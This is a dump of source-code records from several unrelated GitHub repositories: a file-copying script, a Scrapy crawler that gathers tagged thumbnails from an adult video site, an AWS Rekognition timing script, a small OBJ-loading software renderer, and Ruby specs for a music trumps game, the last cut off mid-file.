"text": "#!/usr/bin/python\n\nimport os\nimport random\nimport shutil\nimport sys\n\nif os.path.isdir(r\"./encryptedMsg/\"):\n print \"Deleting existing encryptedMsg directory\"\n shutil.rmtree(r\"./encryptedMsg/\")\nprint \"Creating new directory named encryptedMsg\"\nos.mkdir(r\"./encryptedMsg/\")\n\nif os.path.isdir(r\"./newMessage/\"):\n filenames = os.listdir(r\"./newMessage/\")\n if len(filenames) < 1:\n print \"'newMessage' directory is empty. Run creator.py to create a message\"\n print \"Exiting...\"\n sys.exit()\nelse:\n print \"'newMessage' directory does not exist. Run creator.py to create a message\"\n print \"Exiting...\"\n sys.exit()\n\nfor filename in filenames:\n src = r\"./newMessage/\"+filename\n dst = r\"./encryptedMsg/\" + str(random.randint(1, 30)) + filename\n shutil.copy(src, dst)\nprint \"Completed encrypting\"\n"
}
] | 4 |
aomelo/phtncrawler
|
https://github.com/aomelo/phtncrawler
|
a0490276411d8d7ef60f8379936297509d0efdbf
|
24276210395516dd593da34aa432adb4bd8d4f6a
|
af0d77997335681aa4d6acc862d2d6a192326681
|
refs/heads/master
| 2021-01-19T04:21:39.525177 | 2016-07-14T18:35:29 | 2016-07-14T18:35:29 | 63,360,365 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5505906343460083,
"alphanum_fraction": 0.5593220591545105,
"avg_line_length": 45.369049072265625,
"blob_id": "62b1094445589d986ee96f1fe7766973e332145c",
"content_id": "c648722339a7ce679fdb777b4de308c1b89d1120",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3894,
"license_type": "no_license",
"max_line_length": 133,
"num_lines": 84,
"path": "/craigslist_sample/spiders/ph.py",
"repo_name": "aomelo/phtncrawler",
"src_encoding": "UTF-8",
"text": "from scrapy.spiders import CrawlSpider, Rule\nfrom scrapy import Request\nfrom scrapy.selector import Selector\nfrom scrapy.linkextractors import LinkExtractor\nfrom craigslist_sample.items import PhItem\nimport re\nfrom demjson import decode\nfrom math import ceil\nimport craigslist_sample.settings\nfrom craigslist_sample.settings import VIDEO_RESOLUTION\n\nclass MySpider(CrawlSpider):\n name = \"ph\"\n prefix = \"http://www.pornhub.com\"\n allowed_domains = [\"www.pornhub.com\",\n \"cdnt4b.video.pornhub.phncdn.com\",\n \"cdn1.video.pornhub.phncdn.com\",\n \"cdn2b.video.pornhub.phncdn.com\",\n \"[0-9|a-z|A-Z|.]*.rncdn3.com\",\n \".*.video.pornhub.phncdn.com\",]\n start_urls = [\"http://www.pornhub.com/video?c=41\",\n #\"http://www.pornhub.com/channels/povd/videos?o=vi\",\n #\"http://www.pornhub.com/channels/povd/videos?o=ra\"\n ]\n\n #rules = (\n # Rule(LinkExtractor(allow=(), restrict_xpaths=('//li[@class=\"page_next\"]',)), callback=\"parse\", follow=True),\n #)\n\n def generate_file_urls(self,item):\n num_urls = int(ceil(float(item[\"duration\"])/float(item[\"thumbsFrequency\"])/25.0))\n file_urls = []\n pattern = item[\"thumbnails\"]\n print pattern\n for i in range(num_urls):\n url = re.sub(\"S\\{[0-9]*\\}\", (\"S\"+str(i)), pattern)\n print url\n file_urls.append(url)\n return file_urls\n\n\n\n def parse_video(self, response):\n hxs = Selector(response)\n\n item = PhItem()\n item[\"link\"] = response.url\n item[\"viewkey\"] = re.search(\"viewkey=(.*)\", response.url).group(1)\n item[\"id\"] = hxs.xpath('//div/@data-video-id').extract()[0]\n item[\"title\"] = hxs.xpath('//title').extract()[0]\n item[\"duration\"] = hxs.xpath('//div/@data-duration').extract()[0]\n jscode = hxs.xpath('//div[@id=\"player\"]/script[@type=\"text/javascript\"]').extract()[0]\n if not jscode == []:\n #download_url = re.search(\"var player_quality_\"+settings.VIDEO_RESOLUTION+\" = '(.*)';\", jscode[0]).group(1).split(\";\")[0]\n #download_url = re.search(\"var player_quality_\"+VIDEO_RESOLUTION+\"p = '(.*)';\", jscode).group(1).split(\";\")[0]\n #if download_url and VIDEO_RESOLUTION in download_url:\n # item[\"file_urls\"] = [download_url.replace(\"'\",\"\")]\n jscode = hxs.xpath('//div[@class=\"video-wrapper\"]/div/script[@type=\"text/javascript\"]').extract()[0]\n flash_vars = re.search(\"var flashvars_[0-9]* = (\\{.*\\});\",jscode).group(1)\n jsonvars = decode(flash_vars)\n if \"actionTags\" in jsonvars:\n tags = jsonvars[\"actionTags\"]\n if tags:\n item[\"tags\"] = tags\n item[\"thumbnails\"] = jsonvars[\"thumbs\"][\"urlPattern\"]\n item[\"thumbsFrequency\"] = jsonvars[\"thumbs\"][\"samplingFrequency\"]\n height = int(jsonvars[\"thumbs\"][\"thumbHeight\"])\n width = int(jsonvars[\"thumbs\"][\"thumbWidth\"])\n if height==90 and width>=160 and item[\"thumbnails\"]:\n item[\"file_urls\"] = self.generate_file_urls(item)\n yield item\n\n def parse(self, response):\n hxs = Selector(response)\n videos = hxs.xpath('//li[@class=\"videoblock\"]/div/div/a')\n if not videos:\n videos = hxs.xpath('//div[@class=\"phimage\"]/a')\n for video in videos:\n url = response.urljoin(video.xpath(\"@href\").extract()[0])\n yield Request(url, callback=self.parse_video, method=\"GET\")\n next_page = hxs.xpath('//li[@class=\"page_next\"]/a/@href')\n if next_page:\n url = response.urljoin(next_page[0].extract())\n yield Request(url, callback=self.parse, method=\"GET\")"
},
{
"alpha_fraction": 0.8037735819816589,
"alphanum_fraction": 0.8056603670120239,
"avg_line_length": 26.947368621826172,
"blob_id": "ed5d0c709baff2e29b76b912e622735a0d1aa413",
"content_id": "63571703cb6a7f37e38c325b5214036cf8213303",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 530,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 19,
"path": "/craigslist_sample/middlewares.py",
"repo_name": "aomelo/phtncrawler",
"src_encoding": "UTF-8",
"text": "# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: http://doc.scrapy.org/topics/item-pipeline.html\n\nfrom scrapy.pipelines.files import FilesPipeline\nfrom scrapy import Request\nfrom scrapy.exceptions import DropItem\nfrom scrapy.xlib.pydispatch import dispatcher\nfrom scrapy import signals\nfrom scrapy.contrib.exporter import XmlItemExporter\nimport cv2\nimport os\nimport settings\n\nclass PhMiddleware(object):\n\n def process_request(self,request,spider):\n return None"
},
{
"alpha_fraction": 0.6326530575752258,
"alphanum_fraction": 0.6326530575752258,
"avg_line_length": 20.34782600402832,
"blob_id": "294bea43af7b482ea09fb3daa15c5fb0191b6666",
"content_id": "dbccc7691b22c69adac4efd2927f955106962ada",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 490,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 23,
"path": "/craigslist_sample/items.py",
"repo_name": "aomelo/phtncrawler",
"src_encoding": "UTF-8",
"text": "# Define here the models for your scraped items\n#\n# See documentation in:\n# http://doc.scrapy.org/topics/items.html\n\nfrom scrapy.item import Item, Field\n\nclass CraigslistSampleItem(Item):\n title = Field()\n link = Field()\n\nclass PhItem(Item):\n title = Field()\n link = Field()\n id = Field()\n duration = Field()\n file_urls = Field()\n file_paths = Field()\n tags = Field()\n viewkey = Field()\n tags = Field()\n thumbnails = Field()\n thumbsFrequency = Field()"
},
{
"alpha_fraction": 0.5590121746063232,
"alphanum_fraction": 0.5662283301353455,
"avg_line_length": 32,
"blob_id": "cf9d4de40afef9356eefff90ccf28e35ce7767f1",
"content_id": "a68d70fb0d7eb1ac3efbdf8e9e855dd6ee8706aa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6236,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 189,
"path": "/craigslist_sample/pipelines.py",
"repo_name": "aomelo/phtncrawler",
"src_encoding": "UTF-8",
"text": "# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: http://doc.scrapy.org/topics/item-pipeline.html\n\nfrom scrapy.pipelines.files import FilesPipeline\nfrom scrapy import Request\nfrom scrapy.exceptions import DropItem\nfrom scrapy.xlib.pydispatch import dispatcher\nfrom scrapy import signals\nfrom scrapy.contrib.exporter import JsonItemExporter\nimport numpy as np\nimport cv2\nimport os\nimport settings\nfrom scipy import ndimage\nfrom scipy.misc import imsave\nfrom settings import FILES_STORE, VIDEO_RESOLUTION, SAMPLE_INTERVAL_SEC\n\nclass CraigslistSamplePipeline(object):\n def process_item(self, item, spider):\n return item\n\n\nclass PhItemPipeline(object):\n def process_item(self, item, spider):\n return item\n\nclass Mp4Pipeline(FilesPipeline):\n\n #def get_media_requests(self, item, info):\n # for file_url in item['file_urls']:\n # yield Request(file_url)\n image_height = VIDEO_RESOLUTION\n image_width = 426\n\n def get_tags_dict(self, tags):\n tagsdict = {}\n for entry in tags.split(\",\"):\n sec = int(entry.split(\":\")[1])\n tag = entry.split(\":\")[0]\n tagsdict[sec] = tag\n return tagsdict\n\n\n def crop(self, image):\n diff_height = image.shape[0] - self.image_height\n diff_width = image.shape[1] - self.image_width\n offset_x = int(diff_height/2)\n offset_y = int(diff_width/2)\n return image[offset_x:offset_x+image_height,offset_y:offset_y+image_width]\n\n def split_thumbnails(self, image, rows=5, cols=5):\n thumbs = []\n h = image.shape[0]\n w = image.shape[1]\n t_h = h/rows\n t_w = w/cols\n for i in range(rows):\n for j in range(cols):\n thumbs.append(image[i*t_h:(i+1)*t_h , j*t_w:(j+1)*t_w])\n return thumbs\n\n def item_completed(self, results, item, info):\n file_paths = [x['path'] for ok, x in results if ok]\n if not file_paths:\n raise DropItem(\"Item contains no files\")\n\n tagsdict = self.get_tags_dict(item['tags']);\n none_tag = settings.FILES_STORE+\"None\"\n if not os.path.isdir(none_tag):\n os.mkdir(none_tag)\n for tag in tagsdict.values():\n tag = settings.FILES_STORE + tag\n if not os.path.isdir(tag):\n os.mkdir(tag)\n\n thumbs = []\n for path in file_paths:\n thumb25_path = os.path.join(FILES_STORE,path)\n thumb25 = ndimage.imread(thumb25_path)\n thumbs = thumbs + self.split_thumbnails(thumb25,5,5)\n thumb25 = None\n os.remove(thumb25_path)\n\n output_paths = []\n interval = int(item[\"thumbsFrequency\"])\n duration = int(item[\"duration\"])\n sec = 0\n for thumb in thumbs:\n if sec<duration:\n tag = \"None\"\n index = [k for k in tagsdict if k <= sec]\n if index:\n tag = tagsdict[max(index)]\n image_name = item[\"viewkey\"]+\"-frame\"+str(sec)+\".jpg\"\n image_path = os.path.join(FILES_STORE,tag,image_name)\n imsave(image_path, thumb)\n output_paths.append(image_path)\n sec += interval\n item[\"file_paths\"] = output_paths\n\n\n\n\n\n\n\n def item_completed_vid(self, results, item, info):\n file_paths = [x['path'] for ok, x in results if ok]\n if not file_paths:\n raise DropItem(\"Item contains no files\")\n\n output_paths = []\n for path in file_paths:\n tagsdict = self.get_tags_dict(item['tags']);\n vid_path = os.path.join(FILES_STORE,path)\n vid = cv2.VideoCapture(vid_path)\n id = item[\"id\"]\n\n none_tag = settings.FILES_STORE+\"None\"\n if not os.path.isdir(none_tag):\n os.mkdir(none_tag)\n for tag in tagsdict.values():\n tag = settings.FILES_STORE + tag\n if not os.path.isdir(tag):\n os.mkdir(tag)\n\n print item['duration']\n duration = int(item['duration'])\n\n success = True\n sec = 0\n success,image = vid.read()\n #if image.shape[0] != self.image_height or image.shape[1] < self.image_width:\n # return None\n print image.shape\n\n\n while success and sec <= duration:\n #if image.shape[1] > self.image_width:\n # image = crop(image)\n\n tag = \"None\"\n index = [k for k in tagsdict if k <= sec]\n if index:\n tag = tagsdict[max(index)]\n image_name = item[\"viewkey\"]+\"-frame\"+str(sec)+\".jpg\"\n image_path = os.path.join(FILES_STORE,tag,image_name)\n cv2.imwrite(image_path, image)\n output_paths.append(image_path)\n sec = sec + SAMPLE_INTERVAL_SEC\n vid.set(0,sec*1000) # 0 = CAP_PROP_POS_MSEC\n success,image = vid.read()\n vid.release()\n os.remove(vid_path)\n\n item['file_paths'] = output_paths\n return item\n\n #def process_item(self, item, spider):\n # info = self.spiderinfo\n # requests = arg_to_iter(self.get_media_requests(item, info))\n # dlist = [self._process_request(r, info, item) for r in requests]\n # dfd = DeferredList(dlist, consumeErrors=1)\n # return dfd.addCallback(self.item_completed, item, info)\n\n\nclass XmlExportPipeline(object):\n\n def __init__(self):\n dispatcher.connect(self.spider_opened, signals.spider_opened)\n dispatcher.connect(self.spider_closed, signals.spider_closed)\n self.files = {}\n\n def spider_opened(self, spider):\n file = open('%s_items.xml' % spider.name, 'w+b')\n self.files[spider] = file\n self.exporter = JsonItemExporter(file)\n self.exporter.start_exporting()\n\n def spider_closed(self, spider):\n self.exporter.finish_exporting()\n file = self.files.pop(spider)\n file.close()\n\n def process_item(self, item, spider):\n self.exporter.export_item(item)\n return item"
},
{
"alpha_fraction": 0.8426966071128845,
"alphanum_fraction": 0.8426966071128845,
"avg_line_length": 43.5,
"blob_id": "4e49e0315641349f21818a439aa00fec25b3c437",
"content_id": "a94ad63364d34a9608360e4c05dac47c7a3b3ad9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 89,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 2,
"path": "/README.md",
"repo_name": "aomelo/phtncrawler",
"src_encoding": "UTF-8",
"text": "# phtncrawler\nPh crawler with screenshots taken from thumbnails and categories as labels\n"
},
{
"alpha_fraction": 0.6837438344955444,
"alphanum_fraction": 0.7300492525100708,
"avg_line_length": 30.71875,
"blob_id": "df42bd776b79b9c48fc5413580126469915568e8",
"content_id": "32d08118a9da2e047a83bb69e293dc98293446bd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1015,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 32,
"path": "/craigslist_sample/settings.py",
"repo_name": "aomelo/phtncrawler",
"src_encoding": "UTF-8",
"text": "# Scrapy settings for craigslist_sample project\n#\n# For simplicity, this file contains only the most important settings by\n# default. All the other settings are documented here:\n#\n# http://doc.scrapy.org/topics/settings.html\n#\n\nBOT_NAME = 'craigslist_sample'\n\nDOWNLOAD_HANDLERS = {'s3': None}\n\nSPIDER_MODULES = ['craigslist_sample.spiders']\nNEWSPIDER_MODULE = 'craigslist_sample.spiders'\nITEM_PIPELINES = {'craigslist_sample.pipelines.Mp4Pipeline': 1#,\n #'craigslist_sample.pipelines.XmlExportPipeline': 2\n }\nDOWNLOADER_MIDDLEWARES = {\n 'craigslist_sample.middlewares.PhMiddleware': 543,\n}\nFILES_STORE = './data/'\nFILES_EXPIRES = 7\nSAMPLE_INTERVAL_SEC = 5\nVIDEO_RESOLUTION = '240' # 240p,480p,720p,1080p\nCOOKIES_ENABLED = False\nDOWNLOAD_DELAY = 1\nDOWNLOAD_MAXSIZE = 257741824\nDOWNLOAD_WARNSIZE = 107741824\nDOWNLOAD_TIMEOUT = 600\n\n# Crawl responsibly by identifying yourself (and your website) on the user-agent\n#USER_AGENT = 'craigslist_sample (+http://www.yourdomain.com)'\n"
}
] | 6 |
UZ-junski/python_boto3
|
https://github.com/UZ-junski/python_boto3
|
efb11d5df50396532fc772cf21d70a627451f678
|
0c1ce83077bc85f62baa1f37d5ab3d2fa308d9bb
|
305d4d6d415345e7d35396f19cfa52bde446e18d
|
refs/heads/master
| 2022-09-17T15:43:04.635878 | 2020-05-29T19:13:21 | 2020-05-29T19:13:21 | 267,934,076 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6425396800041199,
"alphanum_fraction": 0.671746015548706,
"avg_line_length": 33.977779388427734,
"blob_id": "2eccaa9134bc56ec261f0afd6f17a3635dc5c0e8",
"content_id": "f6a1124b77a53980639657ed2b377673de5a00ed",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1575,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 45,
"path": "/SJU_boto_recognition.py",
"repo_name": "UZ-junski/python_boto3",
"src_encoding": "UTF-8",
"text": "from PIL import Image\nimport boto3\nimport time\nimport os\nimport json\n\nbase = os.getcwd()\nmanPhotoDir = os.path.join(base,'ver_3')\n#photo = '3.png'\nregion='eu-west-1'\n\n#with open(photo, 'rb') as source_image:\n# source_bytes = source_image.read()\nxVectors = [-50, 0, 50]\nyVectors = [100, 150, 200, 250, 300]\nsavedPhotos = [1, 2, 3, 4, 5, 6]\nphotosType = ['FrontOff1', 'FrontOff2', 'FrontOn1', 'FrontOn2', 'Back1', 'Back2']\nfileNames =list()\nprint('geting paths of files')\nfor y in yVectors:\n for x in xVectors:\n for photoNo in savedPhotos:\n fileNames.append(os.path.join(os.path.join(manPhotoDir, str(y) + '_' + str(x) ), str(photoNo) +'.bmp'))\nresultDictionary = dict.fromkeys(fileNames , '')\nformatTimes = list()\nprint('convert bmps to png')\nfor fName in fileNames:\n start_time = time.time()\n Image.open(fName).save(fName.replace('.bmp', '.png'))\n resultDictionary[fName]=str((time.time() - start_time)*1000)\n# formatTimes.append()\n#print(\"Times for coverting files\")\n#print(', '.join(str(x) for x in formatTimes))\nprint('sending requests')\nclient = boto3.client('rekognition')\nfor fName in fileNames:\n with open(fName.replace('.bmp', '.png'), 'rb') as source_image:\n source_bytes = source_image.read()\n start_time = time.time()\n response = client.detect_labels(Image={'Bytes': source_bytes}, MaxLabels = 3)\n resultDictionary[fName]+=';'+str((time.time() - start_time)*1000)+os.linesep+json.dumps(response)\nprint('saving responses')\na_file = open('results.json', 'w')\njson.dump(resultDictionary, a_file)\na_file.close()\n\n"
}
] | 1 |
Diego223/SR3
|
https://github.com/Diego223/SR3
|
9b30d1f491e0a2d8c1211ce8765e96ac72fad293
|
e4e0db43e21085c48b6ad1ffd944cd5bfd4c75c3
|
bc5f419d2580d0b93230fd5a0d1ebe6bbef7cacb
|
refs/heads/main
| 2023-07-08T00:07:57.515098 | 2021-07-31T20:09:11 | 2021-07-31T20:09:11 | 390,601,341 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.44595804810523987,
"alphanum_fraction": 0.46549561619758606,
"avg_line_length": 26.464284896850586,
"blob_id": "8a1a733679adb4ce55509387b9e2b8e8926ee796",
"content_id": "251c388fa404ff6793486d0dd507f1466429fa01",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5579,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 196,
"path": "/SR3 OBJ LOADER/Base.py",
"repo_name": "Diego223/SR3",
"src_encoding": "UTF-8",
"text": "#Universidad del Valle de Guatemala\r\n#Graficas por Computadora\r\n#Laboratorio SR3\r\n#Diego Crespo 19541\r\nimport struct\r\nfrom collections import namedtuple\r\nfrom Loader import Obj\r\n\r\nLineV2 = namedtuple('Point2', ['x', 'y'])\r\n\r\ndef bytec(c):\r\n return struct.pack('=c', c.encode('ascii'))\r\n\r\ndef duo(w):\r\n return struct.pack('=h', w)\r\n\r\ndef dduo(d):\r\n return struct.pack('=l', d)\r\n\r\ndef color(r, g, b):\r\n return bytes([int(b * 255), int(g * 255), int(r * 255)])\r\n\r\n\r\nblack = color(0, 0, 0)\r\nwhite = color(1, 1, 1)\r\n\r\n\r\nclass Engine(object):\r\n def __init__(self, width, height):\r\n self.pointsColor = white\r\n self.bgColor = black\r\n self.newWindow(width, height)\r\n\r\n def Viewport(self, x, y, width, height):\r\n self.viewX = x\r\n self.viewY = y\r\n self.portWidth = width\r\n self.portHeight = height\r\n\r\n def Clear(self):\r\n self.pixels = [[ self.bgColor for y in range(self.height)] for x in range(self.width)]\r\n\r\n def newWindow(self, width, height):\r\n self.width = width\r\n self.height = height\r\n self.Clear()\r\n self.Viewport(0, 0, width, height)\r\n \r\n def changeColor(self, r, g, b):\r\n self.pointsColor = color(r, g, b)\r\n\r\n def bgColor(self, r, g, b):\r\n self.bgColor = color(r, g, b)\r\n\r\n def Vertex(self, x, y, color = None):\r\n if x < self.viewX or x >= self.viewX + self.portWidth or y < self.viewY or y >= self.viewY + self.portHeight:\r\n return\r\n\r\n if (0 < x < self.width) and (0 < y < self.height):\r\n self.pixels[int(x)][int(y)] = color or self.pointsColor\r\n\r\n def nVertex(self, x, y, color = None):\r\n x = int( (x + 1) * (self.portWidth / 2) + self.viewX )\r\n y = int( (y + 1) * (self.portHeight / 2) + self.viewY)\r\n \r\n if x < self.viewX or x >= self.viewX + self.portWidth or y < self.viewY or y >= self.viewY + self.portHeight:\r\n return\r\n\r\n if (0 <= x < self.width) and (0 <= y < self.height):\r\n self.pixels[int(x)][int(y)] = color or self.pointsColor\r\n\r\n def Line(self, v0, v1, color=None):\r\n xi = v0.x\r\n xf = v1.x\r\n yi = v0.y\r\n yf = v1.y\r\n\r\n if xi == xf and yi == yf:\r\n self.Vertex(xi,yf,color)\r\n return\r\n\r\n dx = abs(xf - xi)\r\n dy = abs(yf - yi)\r\n\r\n step = dy > dx\r\n\r\n if step:\r\n xi, yi = yi, xi\r\n xf, yf = yf, xf\r\n\r\n if xi > xf:\r\n xi, xf = xf, xi\r\n yi, yf = yf, yi\r\n\r\n dx = abs(xf - xi)\r\n dy = abs(yf - yi)\r\n\r\n offset = 0\r\n limit = 0.5\r\n m = dy/dx\r\n y = yi\r\n\r\n for x in range(xi, xf + 1):\r\n if step:\r\n self.Vertex(y, x, color)\r\n else:\r\n self.Vertex(x, y, color)\r\n\r\n offset += m\r\n if offset >= limit:\r\n y += 1 if yi < yf else -1\r\n limit += 1\r\n\r\n def nLine(self, v0, v1, color = None):\r\n xi = int( (v0.x + 1) * (self.portWidth / 2) + self.viewX)\r\n xf = int( (v1.x + 1) * (self.portWidth / 2) + self.viewX)\r\n yi = int( (v0.y + 1) * (self.portHeight / 2) + self.viewY)\r\n yf = int( (v1.y + 1) * (self.portHeight / 2) + self.viewY)\r\n\r\n dx = abs(xf - xi)\r\n dy = abs(yf - yi)\r\n\r\n step = dy > dx\r\n\r\n if step:\r\n xi, yi = yi, xi\r\n xf, yf = yf, xf\r\n\r\n if xi > xf:\r\n xi, xf = xf, xi\r\n yi, yf = yf, yi\r\n\r\n dx = abs(xf - xi)\r\n dy = abs(yf - yi)\r\n\r\n offset = 0\r\n limit = 0.5\r\n m = dy/dx\r\n y = yi\r\n\r\n for x in range(xi, xf + 1):\r\n if step:\r\n self.glPoint(y, x, color)\r\n else:\r\n self.glPoint(x, y, color)\r\n offset += m\r\n if offset >= limit:\r\n y += 1 if yi < yf else -1\r\n limit += 1\r\n\r\n def loadOBJ(self, filename, translate = LineV2(0.0,0.0), scale = LineV2(1.0,1.0)):\r\n\r\n model = Obj(filename)\r\n\r\n for face in model.faces:\r\n vertsCount = len(face)\r\n\r\n for v in range(vertsCount):\r\n\r\n indexi = face[v][0] - 1\r\n indexf = face[(v + 1) % vertsCount][0] - 1\r\n\r\n verti = model.verts[indexi]\r\n vertf = model.verts[indexf]\r\n\r\n xi = round(verti[0] * scale.x + translate.x)\r\n yi = round(verti[1] * scale.y + translate.y)\r\n xf = round(vertf[0] * scale.x + translate.x)\r\n yf = round(vertf[1] * scale.y + translate.y)\r\n\r\n self.Line(LineV2(xi,yi), LineV2(xf, yf))\r\n\r\n #crea archivo bmp\r\n def glFinish(self, filename):\r\n with open(filename, \"wb\") as file:\r\n file.write(bytes('B'.encode('ascii')))\r\n file.write(bytes('M'.encode('ascii')))\r\n file.write(dduo(14 + 40 + (self.width * self.height * 3)))\r\n file.write(dduo(0))\r\n file.write(dduo(14 + 40))\r\n\r\n file.write(dduo(40))\r\n file.write(dduo(self.width))\r\n file.write(dduo(self.height))\r\n file.write(duo(1))\r\n file.write(duo(24))\r\n file.write(dduo(0))\r\n file.write(dduo(self.width * self.height * 3))\r\n file.write(dduo(0))\r\n file.write(dduo(0))\r\n file.write(dduo(0))\r\n file.write(dduo(0))\r\n\r\n for y in range(self.height):\r\n for x in range(self.width):\r\n file.write(self.pixels[x][y])\r\n"
},
{
"alpha_fraction": 0.4682779312133789,
"alphanum_fraction": 0.4753272831439972,
"avg_line_length": 30.032258987426758,
"blob_id": "c0b4d685c9f3d53c9f8df21291fd1585b1908f1c",
"content_id": "744869197c6d97e037c36edc43e01e881b226238",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 993,
"license_type": "no_license",
"max_line_length": 104,
"num_lines": 31,
"path": "/SR3 OBJ LOADER/Loader.py",
"repo_name": "Diego223/SR3",
"src_encoding": "UTF-8",
"text": "#Universidad del Valle de Guatemala\r\n#Graficas por Computadora\r\n#Laboratorio SR3\r\n#Diego Crespo 19541\r\n\r\nclass Obj(object):\r\n def __init__(self, filename):\r\n with open(filename, \"r\") as file:\r\n self.lines = file.read().splitlines()\r\n\r\n self.verts = []\r\n self.tcoord = []\r\n self.normals = []\r\n self.faces = []\r\n\r\n self.read()\r\n\r\n\r\n def read(self):\r\n for line in self.lines:\r\n if line:\r\n prefix, value = line.split(' ', 1)\r\n\r\n if prefix == 'v':\r\n self.verts.append(list(map(float, value.split(' '))))\r\n elif prefix == 'vt': \r\n self.tcoord.append(list(map(float, value.split(' '))))\r\n elif prefix == 'vn':\r\n self.normals.append(list(map(float, value.split(' '))))\r\n elif prefix == 'f':\r\n self.faces.append( [ list(map(int, vert.split('/'))) for vert in value.split(' ')] )\r\n"
},
{
"alpha_fraction": 0.6545454263687134,
"alphanum_fraction": 0.7272727489471436,
"avg_line_length": 18.75,
"blob_id": "bfbe268d6f2ce426bb6983e9db488f5de6f98def",
"content_id": "2265f2fafea98b5590639a4421a7e88e125fad66",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 330,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 16,
"path": "/SR3 OBJ LOADER/Engine.py",
"repo_name": "Diego223/SR3",
"src_encoding": "UTF-8",
"text": "#Universidad del Valle de Guatemala\r\n#Graficas por Computadora\r\n#Laboratorio SR3\r\n#Diego Crespo 19541\r\nfrom Base import LineV2, Engine, color\r\nimport random\r\n\r\nwidth = 1920\r\nheight = 1080\r\n\r\ndrawer = Engine(width, height)\r\n\r\ndrawer.loadOBJ(\"face.obj\", LineV2(width/2, height/6), LineV2(30,30))\r\n\r\n\r\ndrawer.glFinish(\"SALIDAMODELO3D.bmp\")"
}
] | 3 |
jcoglan/mu_trumps
|
https://github.com/jcoglan/mu_trumps
|
5d01cb7580ca6b20652b79468b5b8c828de2fc03
|
bd41b0a686d4152d4e4ac77bea0fb414ff1e5f59
|
106e5b425e36032fbac80387f4a79974bf3be08b
|
refs/heads/master
| 2020-04-26T09:45:17.403075 | 2011-01-27T15:00:13 | 2011-01-27T15:00:13 | 1,284,268 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6200000047683716,
"alphanum_fraction": 0.6200000047683716,
"avg_line_length": 17.18181800842285,
"blob_id": "73c5af5c0243f37dafc2bca9de2467b533b7854a",
"content_id": "4fcfaba2f302734ae8bae0be9777f736dc0af073",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 400,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 22,
"path": "/spec/mu_trumps/model/user_spec.rb",
"repo_name": "jcoglan/mu_trumps",
"src_encoding": "UTF-8",
"text": "require 'spec_helper'\n\ndescribe MuTrumps::User do\n let(:user) do\n MuTrumps::User.create(:lastfm_username => \"jcoglan\")\n end\n \n it \"is valid\" do\n user.should be_valid\n end\n \n describe \"with artists\" do\n before do\n @artist = Factory(:artist)\n user.artists << @artist\n end\n \n it \"returns the artists\" do\n user.reload.artists.should == [@artist]\n end\n end\nend\n"
},
{
"alpha_fraction": 0.6037902235984802,
"alphanum_fraction": 0.6051123738288879,
"avg_line_length": 28.855262756347656,
"blob_id": "3519aef96062cb11be19c9109a4218546874e6bd",
"content_id": "1d2b15511ee62d4121f011ace631a96f04126d08",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 4538,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 152,
"path": "/spec/mu_trumps/model/game_spec.rb",
"repo_name": "jcoglan/mu_trumps",
"src_encoding": "UTF-8",
"text": "require 'spec_helper'\n\ndescribe MuTrumps::Game do\n before do\n @imogen = Factory(:artist, :name => \"Imogen Heap\", :id => 100)\n @justin = Factory(:artist, :name => \"Justin Bieber\")\n @gaga = Factory(:artist, :name => \"Lady Gaga\")\n @sufjan = Factory(:artist, :name => \"Sufjan Stevens\")\n end\n \n let(:alice) { Factory :user, :lastfm_username => \"alice\" }\n let(:bob) { Factory :user, :lastfm_username => \"bob\" }\n \n describe \"join\" do\n before do\n MuTrumps::Artist.stub(:random).and_return MuTrumps::Artist.all\n end\n \n describe \"when there are no games\" do\n let(:game) { MuTrumps::Game.join(alice) }\n \n it \"returns a new game with one participant\" do\n game.should be_kind_of(MuTrumps::Game)\n game.users.should == [alice]\n end\n \n it \"returns a game in the waiting state\" do\n game.status.should == \"waiting\"\n end\n \n it \"assigns half the game deck to the user\" do\n game.cards_for(alice).map { |c| c.artist.name }.should == [\"Imogen Heap\", \"Lady Gaga\"]\n end\n end\n \n describe \"when there is a game with no participants\" do\n before do\n @game = MuTrumps::Game.create!\n end\n \n it \"returns the game\" do\n MuTrumps::Game.join(alice).should == @game\n end\n end\n \n describe \"when there is a game with one participant\" do\n let(:game) { MuTrumps::Game.join(bob) }\n \n before do\n @existing_game = MuTrumps::Game.create(:users => [alice])\n end\n \n it \"returns the waiting game with two participants\" do\n game.should == @existing_game\n game.users.should == [alice, bob]\n end\n \n it \"returns a game in the ready state\" do\n game.status.should == \"ready\"\n end\n \n it \"assigns the other half of the game deck to the user\" do\n game.cards_for(bob).map { |c| c.artist.name }.should == 